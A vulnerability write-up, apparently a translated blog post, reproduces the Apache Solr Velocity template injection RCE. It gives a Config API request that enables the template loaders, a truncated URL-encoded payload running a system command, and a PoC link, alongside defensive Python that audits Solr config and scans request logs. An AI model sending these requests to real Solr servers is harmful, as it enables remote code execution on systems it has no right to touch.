Example analysis of Apache Solr velocity template injection RCE vulnerability

12-20-2023

0x01 Introduction

Solr is an enterprise-level standalone search application server that exposes its services through a web service API. Users submit XML files in a prescribed format to the search server over HTTP to build indexes, and can also issue search requests through HTTP GET and receive the results in XML.

0x02 Vulnerability introduction

Solr ships with a VelocityResponseWriter component. An attacker can send a crafted request that changes the relevant configuration so that the VelocityResponseWriter loads a template supplied in the request; the injected Velocity template is then evaluated on the server, which results in remote command execution and lets the attacker take control of the server directly.

0x03 Affected versions

Apache Solr 5.x through 8.2.0, i.e. the versions that provide the Config API.

0x04 Environment setup

Install a Java 8 environment, then download Solr from the following address:

https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

After the download completes, unzip the archive, enter the bin directory and run ./solr start:

unzip solr-8.2.0.zip
./solr start

Some warning messages appear at startup; they can be eliminated by editing the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false.

vim solr.in.sh

Then start it again with ./solr start. If it refuses to start as root, append -force.

Visit http://ip:8983 in the browser and the following interface appears.

However, it was found that core

First, manually create a new_core folder under the /server/solr/ directory, copy the conf directory from /server/solr/configsets/_default/ into new_core, and then click to create the core.

0x05 Vulnerability reproduction

After creating the core, visit the following URL to check whether the application's config can be accessed:

http://ip:8983/solr/new_core/config

Apache Solr integrates the VelocityResponseWriter plug-in by default. In the plug-in's initialization parameters, params.resource.loader.enabled defaults to false, but this setting can be changed to true directly through a POST request to the Config API, after which a crafted GET request achieves remote code execution.

Capture the request to this page with Burp, turn it into a POST request and add the following body:

{
    "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
    }
}
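The configuration change above is exactly what a defender should look for: the /solr/<core>/config endpoint also reads the current settings back, so the same keys can be audited. The following Python is an added example (not code from the article or from the Solr project): it parses a constructed sample of the config API's JSON, flags any Velocity writer whose resource loaders are enabled, and builds an "update-queryresponsewriter" command that restores both loaders to false. The JSON shape ("config" -> "queryResponseWriter" -> writer name) is assumed from the Solr Config API.

```python
import json

# Constructed sample of what /solr/<core>/config returns for the
# queryResponseWriter section (shape assumed; not copied from the article).
SAMPLE_CONFIG_JSON = """
{
  "config": {
    "queryResponseWriter": {
      "json": {"class": "solr.JSONResponseWriter"},
      "velocity": {
        "startup": "lazy",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }
  }
}
"""

# The two loader switches named in the article; either one being true lets a
# request supply its own template to the Velocity writer.
DANGEROUS_KEYS = ("params.resource.loader.enabled", "solr.resource.loader.enabled")


def _is_true(value):
    """Config API values may be strings or booleans; normalise both."""
    return str(value).strip().lower() == "true"


def find_velocity_exposure(config_text):
    """Return one finding per response writer that uses VelocityResponseWriter
    and has at least one resource loader enabled."""
    data = json.loads(config_text)
    writers = data.get("config", {}).get("queryResponseWriter", {})
    findings = []
    for name, settings in writers.items():
        if not isinstance(settings, dict):
            continue
        if "VelocityResponseWriter" not in str(settings.get("class", "")):
            continue
        enabled = [k for k in DANGEROUS_KEYS if _is_true(settings.get(k, "false"))]
        if enabled:
            findings.append({"writer": name, "enabled_loaders": enabled})
    return findings


def hardened_update_command():
    """Config API command in the same update-queryresponsewriter form the
    article uses, but re-registering the Velocity writer with both loaders off.
    This only restores the safe default; it does not stop a further
    unauthenticated change, so the article's advice to update still applies."""
    return {
        "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "solr.resource.loader.enabled": "false",
            "params.resource.loader.enabled": "false",
        }
    }


if __name__ == "__main__":
    for f in find_velocity_exposure(SAMPLE_CONFIG_JSON):
        print("exposed writer:", f["writer"], "loaders:", ", ".join(f["enabled_loaders"]))
    print(json.dumps(hardened_update_command(), indent=2))
```

In practice the input to find_velocity_exposure would be the body fetched from http://ip:8983/solr/new_core/config for every core, run on a schedule so that a re-enabled loader is noticed rather than waiting for the follow-up select request.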

Next, a payload can be constructed to achieve RCE.

payload:

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+

POC address: https://github.com/wyzxxz/Apache_Solr_rce_via_velocity_template
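The two requests in this section leave a distinctive trace in the HTTP request log: a POST to a core's /config endpoint followed by a select request with wt=velocity and a v.template.* parameter carrying an inline template. The Python below is an added detection example (not code from the article or the PoC repository): it parses constructed NCSA-style log lines of the kind Solr's embedded Jetty writes, labels each suspicious request, and correlates the config write with the inline-template request per client address. The log lines and the field layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request-log lines in NCSA common format (Solr's Jetty request log
# is similar); these are made-up samples, not logs from the article.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2023:10:01:02 +0000] "GET /solr/new_core/select?q=*:*&wt=json HTTP/1.1" 200 512
10.0.0.9 - - [20/Dec/2023:10:01:10 +0000] "POST /solr/new_core/config HTTP/1.1" 200 40
10.0.0.9 - - [20/Dec/2023:10:01:15 +0000] "GET /solr/new_core/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27) HTTP/1.1" 200 300
10.0.0.7 - - [20/Dec/2023:10:02:00 +0000] "GET /solr/new_core/select?q=test&wt=velocity&v.template=browse HTTP/1.1" 200 2048
"""

# ip, ident, user, [timestamp], "METHOD target protocol", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(method, target):
    """Label one request, or return None when nothing stands out.

    config-api-write          POST to /solr/<core>/config (writer re-registration)
    velocity-inline-template  wt=velocity together with a v.template.<name>
                              parameter, i.e. the template text is in the URL
    velocity-writer-use       wt=velocity that only names an existing template
    """
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST" and parts.path.endswith("/config"):
        return "config-api-write"
    if "velocity" in [v.lower() for v in params.get("wt", [])]:
        # "v.template" selects a template; "v.template.<name>" defines one inline
        if any(k.startswith("v.template.") for k in params):
            return "velocity-inline-template"
        return "velocity-writer-use"
    return None


def scan_log(text):
    """Return (client_ip, label) for every suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        label = classify_request(m.group("method"), m.group("target"))
        if label:
            findings.append((m.group("ip"), label))
    return findings


def correlate(findings):
    """Client addresses that both wrote the Config API and sent an inline
    Velocity template: the full sequence this article describes."""
    by_ip = {}
    for ip, label in findings:
        by_ip.setdefault(ip, set()).add(label)
    return sorted(ip for ip, labels in by_ip.items()
                  if {"config-api-write", "velocity-inline-template"} <= labels)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, label in hits:
        print(ip, label)
    print("config write + inline template from:", correlate(hits))
```

A plain wt=velocity request is not proof of anything by itself (the default configsets ship a browse template), which is why the example keeps "velocity-writer-use" separate from "velocity-inline-template" and only the correlated pair is treated as the sequence from this article.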

0x06 Remediation

Update Solr to the latest version.
